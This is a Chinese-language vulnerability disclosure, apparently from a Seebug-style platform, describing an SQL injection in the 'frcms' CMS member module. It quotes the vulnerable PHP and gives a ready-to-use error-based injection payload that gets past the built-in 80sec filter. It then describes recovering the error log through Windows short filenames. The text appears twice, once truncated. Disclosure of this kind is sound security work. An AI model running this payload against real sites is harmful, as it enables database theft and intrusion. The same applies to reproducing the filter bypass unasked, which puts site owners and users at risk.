### 简要描述: rt ### 详细说明: 看到\member\person_interview.php ``` if($do=='del'){ $checks=$_POST['checks']; $db ->query("delete from {$cfg['tb_pre']}myinterview where i_pmember='$username' and i_id in ($checks)"); showmsg('删除成功!',"?m=person_interview&show=$show",0,2000);exit(); ``` 由上面的代码可以看出来,$checks直接进入了sql中,而且没有单引号。 但是,这个cms内置了一个80sec的过滤脚本。当然,网上对其的绕过有很详细的方法。 ``` http://127.0.0.1/frcms/member/index.php?m=person_interview&do=del ``` 然后在POST提交数据。 ``` checks=1) and char(@`'`) or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) %23`'` ``` 但是,这样是直接没有回显的,因为它会把sql错误信息写入一个log里面。 这个log文件的命名,可以看到以下代码。 ``` function log_write($message, $type = 'php') { global $cfg, $fr_time, $username; $userip = getip(); $fr_time or $fr_time = time(); $user = $username ? $username : 'guest'; dir_create(DATA_ROOT.'/log/'); $log_file =...
### 简要描述: rt ### 详细说明: 看到\member\person_interview.php ``` if($do=='del'){ $checks=$_POST['checks']; $db ->query("delete from {$cfg['tb_pre']}myinterview where i_pmember='$username' and i_id in ($checks)"); showmsg('删除成功!',"?m=person_interview&show=$show",0,2000);exit(); ``` 由上面的代码可以看出来,$checks直接进入了sql中,而且没有单引号。 但是,这个cms内置了一个80sec的过滤脚本。当然,网上对其的绕过有很详细的方法。 ``` http://127.0.0.1/frcms/member/index.php?m=person_interview&do=del ``` 然后在POST提交数据。 ``` checks=1) and char(@`'`) or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) %23`'` ``` 但是,这样是直接没有回显的,因为它会把sql错误信息写入一个log里面。 这个log文件的命名,可以看到以下代码。 ``` function log_write($message, $type = 'php') { global $cfg, $fr_time, $username; $userip = getip(); $fr_time or $fr_time = time(); $user = $username ? $username : 'guest'; dir_create(DATA_ROOT.'/log/'); $log_file = DATA_ROOT.'/log/'.$type.'_'.md5($cfg['cookie_encode']).'.txt'; $log = date('Y-m-d H:i:s', $fr_time)."||$userip||$user||".$_SERVER['SCRIPT_NAME']."||".str_replace('&', '&', $_SERVER['QUERY_STRING'])."||$message\r\n"; $olog=file_get_contents($log_file); fputs(fopen($log_file,"w"), $log.$olog); } ``` 通过md5$cfg['cookie_encode'],看起来好像是无法,访问到的。但是,在Windows可以通过短文件名访问。 我们只需要文件名前6位就行。而且这个log前四位固定为sql_,后面两位秒秒钟跑一下就出来了。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201501/101416406b3920ef1c078dd0188c2692621658d5.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101416406b3920ef1c078dd0188c2692621658d5.jpg) [<img src="https://images.seebug.org/upload/201501/1014174788bc936958a107cef5c9591e03f6db4b.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1014174788bc936958a107cef5c9591e03f6db4b.jpg) [<img src="https://images.seebug.org/upload/201501/10141943823fc010e429b73e9ba29ced139a8396.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10141943823fc010e429b73e9ba29ced139a8396.jpg)
